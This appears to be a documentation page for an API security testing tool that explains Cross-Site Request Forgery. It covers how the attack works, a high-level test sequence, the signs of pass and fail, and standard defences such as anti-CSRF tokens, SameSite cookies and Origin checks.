Skip to main content
Version: v1

CSRF (Cross-Site Request Forgery)

CSRF

What is it?​

Cross-Site Request Forgery (CSRF) occurs when an attacker tricks an authenticated user’s browser into making unintended requests to an API, leveraging the user’s existing session or credentials.

This vulnerability primarily affects APIs that rely on browser-based authentication mechanisms, such as cookies, where credentials are automatically included in requests.

Since the API cannot distinguish between legitimate user actions and forged requests, attackers can perform sensitive operations on behalf of the user.

CSRF is particularly critical for state-changing operations and can lead to unauthorized transactions, account modifications, or privilege abuse.

What are specific examples?​

  • A malicious website triggering a POST /transfer request using the victim’s active session
  • APIs accepting state-changing requests without CSRF tokens
  • Cookie-based authentication without SameSite protections
  • Missing validation of Origin or Referer headers
  • Sensitive actions exposed via browser-accessible endpoints
  • CSRF protections implemented only on frontend, not enforced at API level

Test case FAQs​

When is this test case applicable?​

  • APIs using cookie-based authentication
  • Browser-accessible endpoints
  • Endpoints performing state-changing operations (POST, PUT, DELETE)
  • Applications supporting cross-origin interactions

How does it work?​

Prerequisites​

  • Authenticated session (typically via cookies)
  • Ability to simulate cross-origin requests
  • Identification of state-changing endpoints

Test sequence​

  1. Identify endpoints relying on cookie-based authentication
  2. Send forged cross-origin requests without CSRF tokens
  3. Replay requests with missing or invalid:
    • CSRF tokens
    • Origin/Referer headers
  4. Analyze whether the request is accepted and executed
  5. Validate if sensitive state changes occur without user intent

Success/Failure indications​

  • Failure (vulnerable):

    • State-changing request succeeds without CSRF token
    • API accepts requests from untrusted origins
    • Missing or ignored Origin/Referer validation

  • Success (secure):

    • Requests rejected without valid CSRF token
    • Origin/Referer properly validated
    • SameSite cookie protections enforced

What is the solution?​

  • Implement anti-CSRF tokens for all state-changing operations
  • Enforce SameSite cookie attributes (Strict or Lax)
  • Validate Origin and Referer headers
  • Prefer token-based authentication (Authorization headers) over cookies
  • Avoid exposing sensitive operations to browser contexts when unnecessary
  • Ensure CSRF protections are enforced server-side

References​

Was this page helpful?